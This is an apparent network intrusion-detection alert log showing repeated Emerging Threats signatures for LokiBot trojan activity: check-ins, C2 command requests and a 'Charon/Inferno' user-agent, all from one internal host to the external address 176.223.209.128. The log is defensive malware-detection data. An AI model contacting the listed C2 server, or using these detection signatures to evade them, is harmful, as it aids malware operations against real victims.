11/25/21-10:49:43.093221	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50022	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.580124	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50023	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.580124	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50023	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.580124	TCP	2025381	ET TROJAN LokiBot Checkin	50023	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.580124	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50023	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.062925	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50024	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.062925	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50024	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.062925	TCP	2025381	ET TROJAN LokiBot Checkin	50024	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.062925	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50024	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.593789	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50025	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.593789	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50025	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.593789	TCP	2025381	ET TROJAN LokiBot Checkin	50025	80	192.168.11.20	176.223.209.128
11/25/21-10:49:44.593789	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50025	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.081557	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50026	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.081557	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50026	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.081557	TCP	2025381	ET TROJAN LokiBot Checkin	50026	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.081557	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50026	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.567535	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50027	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.567535	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50027	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.567535	TCP	2025381	ET TROJAN LokiBot Checkin	50027	80	192.168.11.20	176.223.209.128
11/25/21-10:49:45.567535	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50027	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.099241	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50029	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.099241	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50029	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.099241	TCP	2025381	ET TROJAN LokiBot Checkin	50029	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.099241	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50029	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.560009	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50030	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.560009	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50030	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.560009	TCP	2025381	ET TROJAN LokiBot Checkin	50030	80	192.168.11.20	176.223.209.128
11/25/21-10:49:46.560009	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50030	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.093239	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50031	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.093239	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50031	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.093239	TCP	2025381	ET TROJAN LokiBot Checkin	50031	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.093239	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50031	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.621286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50032	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.621286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50032	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.621286	TCP	2025381	ET TROJAN LokiBot Checkin	50032	80	192.168.11.20	176.223.209.128
11/25/21-10:49:47.621286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50032	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.138015	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50033	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.138015	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50033	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.138015	TCP	2025381	ET TROJAN LokiBot Checkin	50033	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.138015	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50033	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.608440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50034	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.608440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50034	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.608440	TCP	2025381	ET TROJAN LokiBot Checkin	50034	80	192.168.11.20	176.223.209.128
11/25/21-10:49:48.608440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50034	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.101921	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50035	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.101921	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50035	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.101921	TCP	2025381	ET TROJAN LokiBot Checkin	50035	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.101921	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50035	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.626649	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50036	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.626649	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50036	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.626649	TCP	2025381	ET TROJAN LokiBot Checkin	50036	80	192.168.11.20	176.223.209.128
11/25/21-10:49:49.626649	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50036	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.135554	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50037	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.135554	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50037	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.135554	TCP	2025381	ET TROJAN LokiBot Checkin	50037	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.135554	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50037	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.664838	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50038	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.664838	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50038	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.664838	TCP	2025381	ET TROJAN LokiBot Checkin	50038	80	192.168.11.20	176.223.209.128
11/25/21-10:49:50.664838	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50038	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.178533	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50039	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.178533	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50039	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.178533	TCP	2025381	ET TROJAN LokiBot Checkin	50039	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.178533	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50039	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.668767	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50040	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.668767	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50040	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.668767	TCP	2025381	ET TROJAN LokiBot Checkin	50040	80	192.168.11.20	176.223.209.128
11/25/21-10:49:51.668767	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50040	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.098875	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50041	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.098875	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50041	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.098875	TCP	2025381	ET TROJAN LokiBot Checkin	50041	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.098875	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50041	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.618484	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50042	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.618484	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50042	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.618484	TCP	2025381	ET TROJAN LokiBot Checkin	50042	80	192.168.11.20	176.223.209.128
11/25/21-10:49:52.618484	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50042	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.143999	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50043	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.143999	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50043	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.143999	TCP	2025381	ET TROJAN LokiBot Checkin	50043	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.143999	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50043	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.594525	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50044	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.594525	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50044	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.594525	TCP	2025381	ET TROJAN LokiBot Checkin	50044	80	192.168.11.20	176.223.209.128
11/25/21-10:49:53.594525	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50044	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.082518	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50045	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.082518	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50045	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.082518	TCP	2025381	ET TROJAN LokiBot Checkin	50045	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.082518	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50045	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.580386	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50046	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.580386	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50046	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.580386	TCP	2025381	ET TROJAN LokiBot Checkin	50046	80	192.168.11.20	176.223.209.128
11/25/21-10:49:54.580386	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50046	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.062276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50047	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.062276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50047	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.062276	TCP	2025381	ET TROJAN LokiBot Checkin	50047	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.062276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50047	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.508760	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50048	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.508760	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50048	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.508760	TCP	2025381	ET TROJAN LokiBot Checkin	50048	80	192.168.11.20	176.223.209.128
11/25/21-10:49:55.508760	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50048	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.010864	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50049	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.010864	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50049	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.010864	TCP	2025381	ET TROJAN LokiBot Checkin	50049	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.010864	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50049	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.523326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50050	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.523326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50050	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.523326	TCP	2025381	ET TROJAN LokiBot Checkin	50050	80	192.168.11.20	176.223.209.128
11/25/21-10:49:56.523326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50050	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.024274	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50051	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.024274	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50051	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.024274	TCP	2025381	ET TROJAN LokiBot Checkin	50051	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.024274	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50051	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.509550	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50052	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.509550	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50052	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.509550	TCP	2025381	ET TROJAN LokiBot Checkin	50052	80	192.168.11.20	176.223.209.128
11/25/21-10:49:57.509550	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50052	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.004627	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50053	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.004627	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50053	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.004627	TCP	2025381	ET TROJAN LokiBot Checkin	50053	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.004627	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50053	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.514003	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50054	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.514003	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50054	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.514003	TCP	2025381	ET TROJAN LokiBot Checkin	50054	80	192.168.11.20	176.223.209.128
11/25/21-10:49:58.514003	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50054	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.022258	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50055	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.022258	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50055	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.022258	TCP	2025381	ET TROJAN LokiBot Checkin	50055	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.022258	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50055	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.545415	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50056	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.545415	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50056	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.545415	TCP	2025381	ET TROJAN LokiBot Checkin	50056	80	192.168.11.20	176.223.209.128
11/25/21-10:49:59.545415	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50056	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.060117	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50057	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.060117	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50057	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.060117	TCP	2025381	ET TROJAN LokiBot Checkin	50057	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.060117	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50057	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.566566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50058	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.566566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50058	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.566566	TCP	2025381	ET TROJAN LokiBot Checkin	50058	80	192.168.11.20	176.223.209.128
11/25/21-10:50:00.566566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50058	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.074114	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50059	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.074114	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50059	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.074114	TCP	2025381	ET TROJAN LokiBot Checkin	50059	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.074114	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50059	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.589853	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50060	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.589853	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50060	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.589853	TCP	2025381	ET TROJAN LokiBot Checkin	50060	80	192.168.11.20	176.223.209.128
11/25/21-10:50:01.589853	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50060	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.090231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50061	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.090231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50061	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.090231	TCP	2025381	ET TROJAN LokiBot Checkin	50061	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.090231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50061	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.599251	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50062	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.599251	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50062	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.599251	TCP	2025381	ET TROJAN LokiBot Checkin	50062	80	192.168.11.20	176.223.209.128
11/25/21-10:50:02.599251	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50062	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.115368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50063	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.115368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50063	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.115368	TCP	2025381	ET TROJAN LokiBot Checkin	50063	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.115368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50063	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.594284	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50064	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.594284	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50064	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.594284	TCP	2025381	ET TROJAN LokiBot Checkin	50064	80	192.168.11.20	176.223.209.128
11/25/21-10:50:03.594284	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50064	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.083753	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50065	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.083753	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50065	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.083753	TCP	2025381	ET TROJAN LokiBot Checkin	50065	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.083753	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50065	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.617832	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50066	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.617832	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50066	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.617832	TCP	2025381	ET TROJAN LokiBot Checkin	50066	80	192.168.11.20	176.223.209.128
11/25/21-10:50:04.617832	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50066	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.185905	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50067	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.185905	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50067	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.185905	TCP	2025381	ET TROJAN LokiBot Checkin	50067	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.185905	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50067	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.692300	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50068	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.692300	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50068	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.692300	TCP	2025381	ET TROJAN LokiBot Checkin	50068	80	192.168.11.20	176.223.209.128
11/25/21-10:50:05.692300	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50068	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.194184	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50069	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.194184	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50069	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.194184	TCP	2025381	ET TROJAN LokiBot Checkin	50069	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.194184	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50069	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.671276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50070	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.671276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50070	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.671276	TCP	2025381	ET TROJAN LokiBot Checkin	50070	80	192.168.11.20	176.223.209.128
11/25/21-10:50:06.671276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50070	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.189424	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50071	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.189424	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50071	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.189424	TCP	2025381	ET TROJAN LokiBot Checkin	50071	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.189424	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50071	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.699299	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50072	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.699299	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50072	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.699299	TCP	2025381	ET TROJAN LokiBot Checkin	50072	80	192.168.11.20	176.223.209.128
11/25/21-10:50:07.699299	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50072	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.202000	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50073	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.202000	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50073	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.202000	TCP	2025381	ET TROJAN LokiBot Checkin	50073	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.202000	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50073	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.706879	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50074	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.706879	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50074	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.706879	TCP	2025381	ET TROJAN LokiBot Checkin	50074	80	192.168.11.20	176.223.209.128
11/25/21-10:50:08.706879	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50074	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.222780	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50075	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.222780	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50075	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.222780	TCP	2025381	ET TROJAN LokiBot Checkin	50075	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.222780	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50075	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.674116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50076	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.674116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50076	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.674116	TCP	2025381	ET TROJAN LokiBot Checkin	50076	80	192.168.11.20	176.223.209.128
11/25/21-10:50:09.674116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50076	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.188351	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50077	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.188351	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50077	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.188351	TCP	2025381	ET TROJAN LokiBot Checkin	50077	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.188351	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50077	80	192.168.11.20	176.223.209.128
11/25/21-10:50:10.703556	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50078	80	192.168.11.20	176.223.209.128
